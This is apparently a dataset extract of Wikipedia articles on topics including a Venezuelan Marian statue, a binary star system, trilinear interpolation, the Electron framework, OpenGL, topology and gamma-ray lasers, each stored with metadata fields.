id
int64
580
79M
url
stringlengths
31
175
text
stringlengths
9
245k
source
stringlengths
1
109
categories
stringclasses
160 values
token_count
int64
3
51.8k
64,080,299
https://en.wikipedia.org/wiki/Monumento%20a%20la%20Virgen%20de%20la%20Paz
The Monumento a la Virgen de la Paz is a colossal statue honoring Mary. Completely made out of concrete, it is located southwest of the city of Trujillo in Venezuela. At tall it is the 48th tallest statue in the world, the tallest statue in South America and the second-tallest in the Americas, the fourth-tallest statue depicting a woman in the world, and the second tallest statue of Mary in the world. It is across, with a base that is deep, and weighs 1,200 tonnes. It was designed by the Spanish-Venezuelan sculptor Manuel de la Fuente and opened on 21 December 1983 by President Luis Herrera Campins. The monument stands at about above sea level, in the region named Peña de la Virgen — where it is said that the virgin appeared in the year 1570. From the monument there are spectacular panoramic views of the region: on a clear day, one can see all of the state of Trujillo, parts of the Sierra Nevada de Mérida, and the south coast of Lake Maracaibo. Since 1568 the virgin of Nuestra Señora de la Paz (Our Lady of Peace) has been the spiritual patron of Trujillo; since 1960 she has been the patron of this diocese, as well. The dove in the statue's right hand symbolizes the responsibility of the presidency of Venezuela to make peace across the land. For many years the statue was administered through a private foundation, before passing to the directorship of the government of the state of Trujillo. Despite its colossal size and the importance of its commemorative symbolism of the patron saint of the state, the monument is one of the least visited tourist spots in Trujillo and in Venezuela. In Easter 2010 the Trujillo government reported 11,000 visitors to the monument, while the José Gregorio Hernández sanctuary received close to 80,000 visits, and the traditional way of the cross in the town of Tostós was visited by approximately 57,000 tourists. History The Trujillo area has been relevant in the Christian mysticism beliefs of the inhabitants of the lands around the monument since colonial times. The Virgin of Peace is the patron saint of the state of Trujillo, and the state flag has a green triangle, in its center a white star and inside the star the silhouette of a dove, a symbol of peace. The three sides of the triangle represent a triad of monuments, two of them religious: The national monument of the Meeting of Bolívar and Morillo in Santa Ana, on the occasion of the Armistice Treaty and Regularization of War The Cathedral Señor Santiago de Nuestra Señora de La Paz, finished in 1662, and where the precious image of Our Lady of Peace was venerated in the 16th century. It is also on the coat of arms of the city and the state, and is where Bishop Lasso de La Vega welcomed Bolívar and entrusted him to divine providence on 1 March 1821 The Monumento a la Virgen de la Paz, an appeal to world peace Virgen de la Paz The origins of the image of the Virgin of Peace probably dates back to the 7th century, associated with Saint Ildefonsus of Toledo (606-667), an archbishop of Toledo, Spain, noted for his devotion to the Virgin Mary. Tradition relates that on a December night, Ildefonsus entered the Cathedral of Santa María de Toledo and witnessed a great illumination inside the temple, purporting to see the Virgin sitting in the archbishop's chair, which has been interpreted as divine approval of Ildefonsus' teachings. The area of Trujillo where the monument is now erected was inhabited by an indigenous society known as Eskuke. It was the site of an indigenous uprising led by the Cacique Pitijoc, of the Cuicas ethnic group against the Spanish colonists. The indigenous people were defeated, and Trujillo was founded in 1557, with the belief of the Virgin of Peace introduced to replace the indigenous goddess Ikake. The legend The name of the monument, the place and the Virgin all refer to the legend of her appearance. On the hill called Peña de la Virgen, according to legend from the late 1550s, the image of the Virgin Mary appeared to several residents of the town of Carmona. With unique features and a youthful spirit, the young woman appeared walking in the afternoons to buy candles for her hearth, and it was in a grocery store where some men asked her why she was alone; she answered that she was "not alone, but with God, the sun and the stars", or "children, don't forget that I walk with God, my protector". As they followed her, the locals saw her hide behind a rock that began to spark, discovering that she was not a mortal young woman but that she was the Virgin Mary. Monumento a la Paz The construction of the monument began as an idea of First Lady of Venezuela Betty Urdaneta de Herrera Campins, who was from Trujillo, and the state governor Dora Maldonado de Falcón. On 21 December 1983, during the bicentennial year of the birth of Simón Bolívar, the Monumento a la Virgin de la Paz was inaugurated, with the liturgical blessing of the newly ordained cardinal José Alí Lebrún Moratinos. The statue shows the Virgin Mary in a blue robe, and its construction had lasted 18 months, carried out by the sculptor Manuel de la Fuente and the engineer Rosendo Camargo, with support of Juan Francisco Hernández. The monument sits on a steel structure, which includes the skeleton of the hollow concrete sculpture. It has a weight of 1,200 tonnes spread over 46 meters high, of which 8 tonnes is the weight of the head alone. The cost of the monument was 9 million bolívares. Despite the fact that Pope John Paul II never visited Trujillo, the dedication of the monument was attended by the Venezuelan ambassador to the Holy See, Luciano Noguera Mora, and was accompanied by a television message from the Pope that was broadcast to the Venezuelan Catholic community. In the speech that the Trujillan writer Mario Briceño Perozo gave during the dedication of the monument, when referring to the tradition of going up to the Peña de la Virgen, he said: Cult of the Virgen de la Paz The monument demonstrates how architectural discourse is capable of generating a discursive synergy between nature-statement and religious statement, capable of leading the observer to a special state of perception of the sacred. The patron fairs in honor of the Virgen de la Paz are held in Trujillo on 24 January, often lasting until 30 January. During the festivities, the monument is treated as one of the most religious places in the state, with masses and processions, as well as gastronomic, cultural and recreational fairs at the site; these often extend to La Plazuela and Isnotú. Dozens of parishioners also gather at the Peña de la Virgen each year for Easter, praying in the attached church. The "Peace March", which takes place every year during Easter, starts early in the morning from the headquarters of the Catholic Seminary in the city of Trujillo and ends with a mass in the monument's chapel. Viewpoints The monument fulfills the function of an extraordinary viewpoint: ascending inside the statue, using stairs that fill the entire interior of the statue, visitors can stop at each of the five viewpoints or lookouts: one for each cardinal direction, and a fifth from the statue's eyes. First lookout: located at the level of the Virgin's knee, 18 meters from the base, which is accessed by a mechanical elevator. From this height you can see the city of Trujillo. Second lookout: located in the left hand of the statue, 4 meters above the first lookout, you can see the city of Trujillo and its surroundings, including the Llanos de Monay, the Agua Viva reservoir, Betijoque, Motatán, and rural parts of Pampanito and Isnotú. It is accessible by wide steps. Third lookout: located in the right hand of the statue, 26 meters up. The Teta de Niquitao can be seen from this height, which at high is the highest point in the state of Trujillo. Fourth lookout: located at the waist level of the statue, at 28 meters high, which can also be reached by elevator. From here, more distant sights can be seen, including La Ceiba, the eastern shore of Lake Maracaibo, the ridges of the Sierra Nevada de Mérida, various plains and much of the land from Trujillo to the state of Lara. Fifth lookout: located in the eyes of the Virgin, 44 meters high, this lookout the most extensive and impressive view. It is reached by more than 200 wide steps. In addition to the viewpoints, the monument consists of a chapel and a bell tower, which rings out every half hour. The dome of the chapel is decorated with a stained glass window. In the center of this, a dove appears surrounded by luminous colors that allude to the spiritual splendor of the symbol. Cave of the Virgin of Peace Lower down the mountain than the Peña de la Virgen, to one side of the monument, there is a group of publicly accessible caves collectively known as Cuevas de la Peña de la Virgen II (Caves of the Peña de la Virgen II). Local folklore says that the caves are interconnected and that the indigenous people of the past used them not only for their religious ceremonies but also to travel through the state. Other caves complexes nearby include the Cuevas de la Peña de la Virgen I, Cueva El Zamurito and Cueva El Ronco. The movements of the Andes over the centuries will have closed whatever connected passageways were supposedly present. The followers of the Virgin frequently visit these caves, often in religious processions, and give offerings and candles at the site. See also List of tallest statues Virgin of El Panecillo Notes References External links Virgen de La Paz Trujillo Venezuela (video) 1983 in Venezuela 1983 sculptures Colossal statues Trujillo (state) Statues of the Virgin Mary Monuments and memorials in Venezuela
Monumento a la Virgen de la Paz
Physics,Mathematics
2,094
65,446,330
https://en.wikipedia.org/wiki/HD%20217786
HD 217786 is a binary star system in the equatorial constellation of Pisces. With an apparent visual magnitude of 7.78, it requires binoculars or a small telescope to view. The system is located at a distance of from the Sun based on parallax, and is drifting further away with a radial velocity of +10 km/s. Kinematically, the star system belongs to the thin disk population of the Milky Way. The primary is an F-type main-sequence star with a stellar classification of F8V. It is much older than Sun with an estimated age of 9.4 billion years and is spinning slowly with a projected rotational velocity of 1.2 km/s. The star has a lower proportion of heavy elements than the Sun, having 65% of solar abundance. It has about the same mass as the Sun but a 32% larger radius. The star is radiating nearly double the luminosity of the Sun from its photosphere at an effective temperature of 5,882 K. A low-mass stellar companion at a projected separation of 155 AU was discovered in 2016. The proper motion of this co-moving object suggests it is gravitationally-bound to the primary, and their orbit is being viewed edge-on. If the orbit is assumed to be circular, then the orbital period for the pair is ~6.2 Myr. No other companion stars have been detected at separations from 2.74 to 76.80 AUs. The star system exhibits strong stellar flare activity in the ultraviolet. Planetary system In 2010 one superjovian planet or brown dwarf on an eccentric orbit was discovered utilising the radial velocity method. Designated component Ab, the high eccentricity of this object may have been caused by interaction with the secondary star. In 2022, the inclination and true mass of HD 217786 Ab were measured via astrometry, and a second planet was discovered orbiting closer to the star. References F-type main-sequence stars Multi-star planetary systems Planetary systems with one confirmed planet Brown dwarfs Pisces (constellation) J23030822-0025465 Durchmusterung objects 217786 113834
HD 217786
Astronomy
444
674,582
https://en.wikipedia.org/wiki/Trilinear%20interpolation
Trilinear interpolation is a method of multivariate interpolation on a 3-dimensional regular grid. It approximates the value of a function at an intermediate point within the local axial rectangular prism linearly, using function data on the lattice points. Trilinear interpolation is frequently used in numerical analysis, data analysis, and computer graphics. Related methods Trilinear interpolation is the extension of linear interpolation, which operates in spaces with dimension , and bilinear interpolation, which operates with dimension , to dimension . These interpolation schemes all use polynomials of order 1, giving an accuracy of order 2, and it requires adjacent pre-defined values surrounding the interpolation point. There are several ways to arrive at trilinear interpolation, which is equivalent to 3-dimensional tensor B-spline interpolation of order 1, and the trilinear interpolation operator is also a tensor product of 3 linear interpolation operators. For an arbitrary, unstructured mesh (as used in finite element analysis), other methods of interpolation must be used; if all the mesh elements are tetrahedra (3D simplices), then barycentric coordinates provide a straightforward procedure. Formulation On a periodic and cubic lattice, let , , and be the differences between each of , , and the smaller coordinate related, that is: where indicates the lattice point below , and indicates the lattice point above and similarly for and . First one interpolates along (imagine one is "pushing" the face of the cube defined by to the opposing face, defined by ), giving: Where means the function value of Then one interpolates these values (along , "pushing" from to ), giving: Finally one interpolates these values along (walking through a line): This gives us a predicted value for the point. The result of trilinear interpolation is independent of the order of the interpolation steps along the three axes: any other order, for instance along , then along , and finally along , produces the same value. Algorithm visualization The above operations can be visualized as follows: First we find the eight corners of a cube that surround our point of interest. These corners have the values , , , , , , , . Next, we perform linear interpolation between and to find , and to find , and to find , and to find . Now we do interpolation between and to find , and to find . Finally, we calculate the value via linear interpolation of and In practice, a trilinear interpolation is identical to two bilinear interpolation combined with a linear interpolation: Alternative algorithm An alternative way to write the solution to the interpolation problem is where the coefficients are found by solving the linear system yielding the result See also Linear interpolation Bilinear interpolation Tricubic interpolation Radial interpolation Tetrahedral interpolation Spherical linear interpolation External links pseudo-code from NASA, describes an iterative inverse trilinear interpolation (given the vertices and the value of C find Xd, Yd and Zd). Paul Bourke, Interpolation methods, 1999. Contains a very clever and simple method to find trilinear interpolation that is based on binary logic and can be extended to any dimension (Tetralinear, Pentalinear, ...). Kenwright, Free-Form Tetrahedron Deformation. International Symposium on Visual Computing. Springer International Publishing, 2015 . Multivariate interpolation Euclidean solid geometry
Trilinear interpolation
Physics
743
2,219,552
https://en.wikipedia.org/wiki/Heavens-Above
Heavens-Above is a non-profit website developed and maintained by Chris Peat as Heavens-Above GmbH. The web site is dedicated to helping people observe and track satellites orbiting the Earth without the need for optical equipment such as binoculars or telescopes. It provides detailed star charts showing the trajectory of the satellites against the background of the stars as seen during a pass. Special attention is paid to the ISS, Starlink satellites, and others. Space Shuttle missions were tracked until the program was retired in July 2011 and Iridium flares were also tracked until the program was retired in May 2018. The website also offers information on currently visible comets, asteroids, planet details, and other miscellaneous information. Sky & Telescope magazine described Heavens-Above as "the most popular website for tracking satellites." Users click on a map of the world to set their viewing location. Lists of objects, their brightness and the time and direction to look to see those objects are given. Space stations, rockets, satellites, space junk as well as Sun, Moon, and planetary data are given. The authors also offer a freeware mobile app that shows similar information for the user's location. See also List of satellite pass predictors References External links Astronomy websites Non-profit organisations based in Germany
Heavens-Above
Astronomy
253
48,640,084
https://en.wikipedia.org/wiki/Electron%20%28software%20framework%29
Electron (formerly known as Atom Shell) is a free and open-source software framework developed and maintained by OpenJS Foundation. The framework is designed to create desktop applications using web technologies (mainly HTML, CSS and JavaScript, although other technologies such as front-end frameworks and WebAssembly are possible) that are rendered using a version of the Chromium browser engine and a back end using the Node.js runtime environment. It also uses various APIs to enable functionality such as native integration with Node.js services and an inter-process communication module. Electron was originally built for Atom and is the main GUI framework behind several other open-source projects including GitHub Desktop, Light Table, Visual Studio Code, WordPress Desktop, and Eclipse Theia. Architecture Electron applications include a "main" process and several "renderer" processes. The main process runs the logic for the application (e.g., menus, shell commands, lifecycle events), and can then launch multiple renderer processes by instantiating an instance of the class, which loads a window that appears on the screen by rendering HTML and CSS. Both the main and renderer processes can run with Node.js integration if the field in the main process is set to . Most of Electron's APIs are written in C++ or Objective-C and are exposed directly to the application code through JavaScript bindings. History In September 2021, Electron moved to an eight-week release cycle between major versions to match the release cycle of Chromium Extended Stable and to comply with a new requirement from the Microsoft Store that requires browser-based apps to be within two major versions of the latest release of the browser engine. Electron frequently releases new major versions along every other Chromium release. The latest three stable versions are supported by the Electron team. Usage Desktop applications built with Electron include Atom, balenaEtcher, Eclipse Theia, Microsoft Teams before 2.0, Slack, and Visual Studio Code. The Brave browser was based on Electron before it was rewritten to use Chromium directly. Reception The most common criticism of Electron is that it necessitates software bloat when used for simple programs. As a result, Michael Larabel has referred to the framework as "notorious among most Linux desktop users for being resource heavy, not integrating well with most desktops, and generally being despised." Researchers have shown that Electron's large feature set can be hijacked by bad actors with write access to the source JavaScript files. This requires root access on *nix systems and is not considered to be a vulnerability by the Electron developers. Those who are concerned that Electron is not always based on the newest version of Chromium have recommended progressive web applications as an alternative. See also References External links 2013 software Cross-platform desktop-apps development Cross-platform software Free and open-source software GitHub Google Chrome Microsoft free software Software using the MIT license
Electron (software framework)
Technology
607
62,014,670
https://en.wikipedia.org/wiki/Virtual%20Viking%20%E2%80%93%20The%20Ambush
Virtual Viking – The Ambush is a 2019 short film directed by Erik Gustavson, using volumetric video capture to create one of the first films in virtual reality. Produced for The Viking Planet centre in Oslo, Norway, the film is part of a wider exhibition of the lives of Norse seafarers and uses a number of VR headsets to enable visitors to experience a Viking longship in the heat of battle. Plot Skald recounts the story of how he was captured, in his youth, during an unsuccessful Viking raid. Cast Murray McArthur as Skald Luke White as Ulf Wolfie Hughes as Grim Christopher Rogers as Trym Ross O'Hennessy as Viking Awards and nominations At the Aesthetica Short Film Festival 2019, Virtual Viking – The Ambush was awarded Best VR Film. References External links 2019 films Norwegian short films Old Norse-language films Head-mounted displays Video game accessories Virtual reality
Virtual Viking – The Ambush
Technology
181
23,426,056
https://en.wikipedia.org/wiki/TDIQ
TDIQ (also known as 6,7-methylenedioxy-1,2,3,4-tetrahydroisoquinoline or MDTHIQ) is a drug used in scientific research, which has anxiolytic and anorectic effects in animals. It has an unusual effects profile in animals, with the effects generalising to cocaine and partially to MDMA and ephedrine, but the effects did not generalise to amphetamine and TDIQ does not have any stimulant effects. It is thought these effects are mediated via a partial agonist action at Alpha-2 adrenergic receptors, and TDIQ has been suggested as a possible drug for the treatment of cocaine dependence. See also MDAI MDAT Norsalsolinol Tetrahydroisoquinoline C10H11NO2 References Alpha-2 adrenergic receptor agonists Heterocyclic compounds with 3 rings Nitrogen heterocycles Oxygen heterocycles
TDIQ
Chemistry
206
4,346,564
https://en.wikipedia.org/wiki/Core%20OpenGL
Core OpenGL, or CGL, is Apple Inc.'s Macintosh Quartz windowing system interface to the OS X implementation of the OpenGL specification. CGL is analogous to GLX, which is the X11 interface to OpenGL, as well as WGL, which is the Microsoft Windows interface to OpenGL. History All windowing system interfaces to OpenGL arose out of the migration of Silicon Graphics proprietary 3D graphics application programming interface (API) IrisGL to its current open standard form OpenGL. When the decision was made to make IrisGL an open standard, the primary required design change was to make this graphics standard API windowing system agnostic. All window system specific logic was therefore removed from IrisGL when moving to OpenGL. Window system logic includes any event mechanism for gathering input from devices such as keyboards and mice, as well as any window ordering or sizing logic used when drawing to a modern windowed user interface. Further, all internal management of window memory buffers, sometimes referred to as surfaces, was also removed from IrisGL to create OpenGL. With OpenGL windowing system agnostic, companies such as Apple must shoulder the burden of configuring and managing the surfaces used as a destination for OpenGL rendering. Features Windowing system interfaces On OS X, CGL is the foundation layer of windowing system interfaces to OpenGL. Both AGL (Apple Graphics Library) and the Cocoa (API) (or AppKit) have interfaces to OpenGL and are logical software layers and depend on CGL for their behavior. CGL and AGL interoperate freely. CGL and Cocoa may be used together, however Cocoa classes may implicitly make changes to CGL state. Function calls from AGL and Cocoa should not be mixed. Configuration of these surfaces is done through a pixel format selection process where different compatible layers of rendering information are combined to form a framebuffer. Examples of such layers are color buffers, transparency buffers (alpha), stencil buffers, and depth buffers. The CGL function CGLChoosePixelFormat is used to perform this buffer compatibility check. CGLChoosePixelFormat will, based on input parameters and their scoring policy, choose a pixel format that represents a compatible buffer configuration that is supported by the underlying renderer that will be used to process graphics commands. Renderers may be either hardware based, such that they correspond to graphics cards installed in the system or they may be software based, where the main CPU of the system handles all of the graphics command processing and final rasterization work. Handling Mac OS X heterogeneity On Mac OS X, CGL is also responsible for handling the heterogeneous nature of graphics device installations and configuration on Macintosh systems. Macintosh computers may have any number of displays and graphics cards installed in them. In these configurations, the user's desktop may be virtualized (extended) or mirrored across multiple displays which are connected to multiple graphics cards which may or may not be from the same graphics vendor. Controlling the rendering When users configure their Macintosh to use a virtualized desktop, and they drag windows from one display to another, CGL handles the management of OpenGL graphics state that must be shadowed between devices to provide command processing consistency between them. Dragging a window across a Macintosh desktop between two different displays that are supported by two different renderers is known as a "Virtual Screen Change". CGL also provides a mechanism to obtain information about the renderer that is currently in use. The primary data structure that maintains OpenGL state on Mac OS X is a CGLContextObj. These CGL contexts can be retrieved at any time using a call to CGLGetCurrentContext. The CGLContextObj may then be queried for specifics about the renderer that is associated with it. Software renderer Also included is Apple's in-house OpenGL software renderer. Originally, this was a simple integer package. In Mac OS X 10.3, a new floating point one was introduced which ultimately replaced it. The software renderer, though slow, is fast enough for basic applications and kept feature-complete with OS X's OpenGL implementation for development purposes. See also GLX: the equivalent X11 interface to OpenGL WGL: the equivalent Microsoft Windows interface to OpenGL AGL OpenGL GLUT: A higher level interface that hides the differences between WGL, GLX, etc. External links CGL reference guide on Apple website (html). - CGL reference guide on Apple website (PDF). - Application programming interfaces Graphics standards OpenGL
Core OpenGL
Technology
956
41,081,248
https://en.wikipedia.org/wiki/Influenza%20A%20virus%20subtype%20H6N1
Influenza A virus subtype H6N1 (A/H6N1), is a subtype of the influenza A virus. It has only infected one person, a woman in Taiwan, who recovered. Known to infect Eurasian teal, it is closely related to subtype H5N1. References Bird diseases H6N1
Influenza A virus subtype H6N1
Biology
72
910,926
https://en.wikipedia.org/wiki/Subspace%20topology
In topology and related areas of mathematics, a subspace of a topological space X is a subset S of X which is equipped with a topology induced from that of X called the subspace topology (or the relative topology, or the induced topology, or the trace topology). Definition Given a topological space and a subset of , the subspace topology on is defined by That is, a subset of is open in the subspace topology if and only if it is the intersection of with an open set in . If is equipped with the subspace topology then it is a topological space in its own right, and is called a subspace of . Subsets of topological spaces are usually assumed to be equipped with the subspace topology unless otherwise stated. Alternatively we can define the subspace topology for a subset of as the coarsest topology for which the inclusion map is continuous. More generally, suppose is an injection from a set to a topological space . Then the subspace topology on is defined as the coarsest topology for which is continuous. The open sets in this topology are precisely the ones of the form for open in . is then homeomorphic to its image in (also with the subspace topology) and is called a topological embedding. A subspace is called an open subspace if the injection is an open map, i.e., if the forward image of an open set of is open in . Likewise it is called a closed subspace if the injection is a closed map. Terminology The distinction between a set and a topological space is often blurred notationally, for convenience, which can be a source of confusion when one first encounters these definitions. Thus, whenever is a subset of , and is a topological space, then the unadorned symbols "" and "" can often be used to refer both to and considered as two subsets of , and also to and as the topological spaces, related as discussed above. So phrases such as " an open subspace of " are used to mean that is an open subspace of , in the sense used above; that is: (i) ; and (ii) is considered to be endowed with the subspace topology. Examples In the following, represents the real numbers with their usual topology. The subspace topology of the natural numbers, as a subspace of , is the discrete topology. The rational numbers considered as a subspace of do not have the discrete topology ({0} for example is not an open set in because there is no open subset of whose intersection with can result in only the singleton {0}). If a and b are rational, then the intervals (a, b) and [a, b] are respectively open and closed, but if a and b are irrational, then the set of all rational x with a < x < b is both open and closed. The set [0,1] as a subspace of is both open and closed, whereas as a subset of it is only closed. As a subspace of , [0, 1] ∪ [2, 3] is composed of two disjoint open subsets (which happen also to be closed), and is therefore a disconnected space. Let S = [0, 1) be a subspace of the real line . Then [0, ) is open in S but not in (as for example the intersection between (-, ) and S results in [0, )). Likewise [, 1) is closed in S but not in (as there is no open subset of that can intersect with [0, 1) to result in [, 1)). S is both open and closed as a subset of itself but not as a subset of . Properties The subspace topology has the following characteristic property. Let be a subspace of and let be the inclusion map. Then for any topological space a map is continuous if and only if the composite map is continuous. This property is characteristic in the sense that it can be used to define the subspace topology on . We list some further properties of the subspace topology. In the following let be a subspace of . If is continuous then the restriction to is continuous. If is continuous then is continuous. The closed sets in are precisely the intersections of with closed sets in . If is a subspace of then is also a subspace of with the same topology. In other words the subspace topology that inherits from is the same as the one it inherits from . Suppose is an open subspace of (so ). Then a subset of is open in if and only if it is open in . Suppose is a closed subspace of (so ). Then a subset of is closed in if and only if it is closed in . If is a basis for then is a basis for . The topology induced on a subset of a metric space by restricting the metric to this subset coincides with subspace topology for this subset. Preservation of topological properties If a topological space having some topological property implies its subspaces have that property, then we say the property is hereditary. If only closed subspaces must share the property we call it weakly hereditary. Every open and every closed subspace of a completely metrizable space is completely metrizable. Every open subspace of a Baire space is a Baire space. Every closed subspace of a compact space is compact. Being a Hausdorff space is hereditary. Being a normal space is weakly hereditary. Total boundedness is hereditary. Being totally disconnected is hereditary. First countability and second countability are hereditary. See also the dual notion quotient space product topology direct sum topology Notes References Bourbaki, Nicolas, Elements of Mathematics: General Topology, Addison-Wesley (1966) Willard, Stephen. General Topology, Dover Publications (2004) Topology General topology
Subspace topology
Physics,Mathematics
1,182
45,285,235
https://en.wikipedia.org/wiki/Penicillium%20coffeae
Penicillium coffeae is a fungus species of the genus of Penicillium which was isolated from the plant Coffea arabica L. in Hawaii. Insects play a role in spreading Penicillium coffeae. See also List of Penicillium species References Further reading coffeae Fungi described in 2005 Fungus species
Penicillium coffeae
Biology
72
572,352
https://en.wikipedia.org/wiki/Complete%20partial%20order
In mathematics, the phrase complete partial order is variously used to refer to at least three similar, but distinct, classes of partially ordered sets, characterized by particular completeness properties. Complete partial orders play a central role in theoretical computer science: in denotational semantics and domain theory. Definitions The term complete partial order, abbreviated cpo, has several possible meanings depending on context. A partially ordered set is a directed-complete partial order (dcpo) if each of its directed subsets has a supremum. (A subset of a partial order is directed if it is non-empty and every pair of elements has an upper bound in the subset.) In the literature, dcpos sometimes also appear under the label up-complete poset. A pointed directed-complete partial order (pointed dcpo, sometimes abbreviated cppo), is a dcpo with a least element (usually denoted ). Formulated differently, a pointed dcpo has a supremum for every directed or empty subset. The term chain-complete partial order is also used, because of the characterization of pointed dcpos as posets in which every chain has a supremum. A related notion is that of ω-complete partial order (ω-cpo). These are posets in which every ω-chain () has a supremum that belongs to the poset. The same notion can be extended to other cardinalities of chains. Every dcpo is an ω-cpo, since every ω-chain is a directed set, but the converse is not true. However, every ω-cpo with a basis is also a dcpo (with the same basis). An ω-cpo (dcpo) with a basis is also called a continuous ω-cpo (or continuous dcpo). Note that complete partial order is never used to mean a poset in which all subsets have suprema; the terminology complete lattice is used for this concept. Requiring the existence of directed suprema can be motivated by viewing directed sets as generalized approximation sequences and suprema as limits of the respective (approximative) computations. This intuition, in the context of denotational semantics, was the motivation behind the development of domain theory. The dual notion of a directed-complete partial order is called a filtered-complete partial order. However, this concept occurs far less frequently in practice, since one usually can work on the dual order explicitly. By analogy with the Dedekind–MacNeille completion of a partially ordered set, every partially ordered set can be extended uniquely to a minimal dcpo. Examples Every finite poset is directed complete. All complete lattices are also directed complete. For any poset, the set of all non-empty filters, ordered by subset inclusion, is a dcpo. Together with the empty filter it is also pointed. If the order has binary meets, then this construction (including the empty filter) actually yields a complete lattice. Every set S can be turned into a pointed dcpo by adding a least element ⊥ and introducing a flat order with ⊥ ≤ s and s ≤ s for every s in S and no other order relations. The set of all partial functions on some given set S can be ordered by defining f ≤ g if and only if g extends f, i.e. if the domain of f is a subset of the domain of g and the values of f and g agree on all inputs for which they are both defined. (Equivalently, f ≤ g if and only if f ⊆ g where f and g are identified with their respective graphs.) This order is a pointed dcpo, where the least element is the nowhere-defined partial function (with empty domain). In fact, ≤ is also bounded complete. This example also demonstrates why it is not always natural to have a greatest element. The set of all linearly independent subsets of a vector space V, ordered by inclusion. The set of all partial choice functions on a collection of non-empty sets, ordered by restriction. The set of all prime ideals of a ring, ordered by inclusion. The specialization order of any sober space is a dcpo. Let us use the term “deductive system” as a set of sentences closed under consequence (for defining notion of consequence, let us use e.g. Alfred Tarski's algebraic approach). There are interesting theorems that concern a set of deductive systems being a directed-complete partial ordering. Also, a set of deductive systems can be chosen to have a least element in a natural way (so that it can be also a pointed dcpo), because the set of all consequences of the empty set (i.e. “the set of the logically provable/logically valid sentences”) is (1) a deductive system (2) contained by all deductive systems. Characterizations An ordered set is a dcpo if and only if every non-empty chain has a supremum. As a corollary, an ordered set is a pointed dcpo if and only if every (possibly empty) chain has a supremum, i.e., if and only if it is chain-complete. Proofs rely on the axiom of choice. Alternatively, an ordered set is a pointed dcpo if and only if every order-preserving self-map of has a least fixpoint. Continuous functions and fixed-points A function f between two dcpos P and Q is called (Scott) continuous if it maps directed sets to directed sets while preserving their suprema: is directed for every directed . for every directed . Note that every continuous function between dcpos is a monotone function. This notion of continuity is equivalent to the topological continuity induced by the Scott topology. The set of all continuous functions between two dcpos P and Q is denoted [P → Q]. Equipped with the pointwise order, this is again a dcpo, and pointed whenever Q is pointed. Thus the complete partial orders with Scott-continuous maps form a cartesian closed category. Every order-preserving self-map f of a pointed dcpo (P, ⊥) has a least fixed-point. If f is continuous then this fixed-point is equal to the supremum of the iterates (⊥, f&hairsp;(⊥), f&hairsp;(f&hairsp;(⊥)), … f n(⊥), …) of ⊥ (see also the Kleene fixed-point theorem). Another fixed point theorem is the Bourbaki-Witt theorem, stating that if is a function from a dcpo to itself with the property that for all , then has a fixed point. This theorem, in turn, can be used to prove that Zorn's lemma is a consequence of the axiom of choice. See also Algebraic posets Scott topology Completeness Notes References Order theory ru:Частично упорядоченное множество#Полное частично упорядоченное множество
Complete partial order
Mathematics
1,490
49,326,597
https://en.wikipedia.org/wiki/Gamma-ray%20laser
A gamma-ray laser, or graser, is a hypothetical device that would produce coherent gamma rays, just as an ordinary laser produces coherent rays of visible light. Potential applications for gamma-ray lasers include medical imaging, spacecraft propulsion, and cancer treatment. In his 2003 Nobel lecture, Vitaly Ginzburg cited the gamma-ray laser as one of the 30 most important problems in physics. The effort to construct a practical gamma-ray laser is interdisciplinary, encompassing quantum mechanics, nuclear and optical spectroscopy, chemistry, solid-state physics, and metallurgy—as well as the generation, moderation, and interaction of neutrons—and involves specialized knowledge and research in all these fields. The subject involves both basic science and engineering technology. Research The problem of obtaining a sufficient concentration of resonant excited (isomeric) nuclear states for collective stimulated emission to occur turns on the broadening of the gamma-ray spectral line. Of the two forms of broadening, homogeneous broadening is the result of the lifetime of the isomeric state: the shorter the lifetime, the more broadened the line. Inhomogeneous broadening comprises all mechanisms by which the homogeneously broadened line is spread over the spectrum. The most familiar inhomogeneous broadening is Doppler recoil broadening from thermal motion of molecules in the solid containing the excited isomer and recoil from gamma-ray emission, in which the emission spectrum is both shifted and broadened. Isomers in solids can emit a sharp component superimposed on the Doppler-broadened background; this is called the Mössbauer effect. This recoilless radiation exhibits a sharp line on top of the Doppler-broadened background that is only slightly shifted from the center of the background. With the inhomogeneous background removed, and a sharp line, it would seem that we have the conditions for gain. But other difficulties that would degrade gain are unexcited states that would resonantly absorb the radiation, opaque impurities, and loss in propagation through the crystal in which the active nuclei are embedded. Much of the latter can be overcome by clever matrix crystal alignment to exploit the transparency provided by the Borrmann effect. Another difficulty, the graser dilemma, is that properties that should enable gain and those that would permit sufficient nuclear inversion density seem incompatible. The time required to activate, separate, concentrate, and crystallize an appreciable number of excited nuclei by conventional radiochemistry is at least a few seconds. To ensure the inversion persists, the lifetime of the excited state must be considerably longer. Furthermore, the heating that would result from neutron-pumping the inversion in situ seems incompatible with maintaining the Mössbauer effect, although there are still avenues to explore. Heating may be reduced by two-stage neutron-gamma pumping, in which neutron capture occurs in a parent-doped converter, where it generates Mössbauer radiation that is then absorbed by ground-state nuclei in the graser. Two-stage pumping of multiple levels offers multiple advantages. Another approach is to use nuclear transitions driven by collective electron oscillations. The scheme would employ a triad of isomeric states: a long-lived storage state, in addition to an upper and lower lasing state. The storage state would be energetically close to the short-lived upper lasing state but separated by a forbidden transition involving one quantum unit of spin angular momentum. The graser would be enabled by a very intense optical laser to slosh the electron cloud back and forth and saturate the forbidden transition in the near field of the cloud. The population of the storage state would then be quickly equalized with the upper lasing state whose transition to the lower lasing state would be both spontaneous and stimulated by resonant gamma radiation. A "complete" chart of nuclides likely contains a very large number of isomeric states, and the existence of such a triad seems likely, but it has yet to be found. Nonlinearities can result in both spatial and temporal harmonics in the near field at the nucleus, opening the range of possibilities for rapid transfer from the storage state to the upper lasing state using other kinds of triads involving transition energies at multiples of the optical laser quantum energy and at higher multipolarities. See also Particle-induced gamma emission References Further reading Balko, B.; Cohen, L.; Sparrow, D. A.; eds. (1989). Gamma-Ray Lasers. Pergamon. http://www.sciencedirect.com/science/book/9780080370156 Provides a definitive overview of the current status of gamma-ray lasers. A review for laymen. Laser types Gamma rays Hypothetical technology
Gamma-ray laser
Physics
971
333,219
https://en.wikipedia.org/wiki/Eulerian%20path
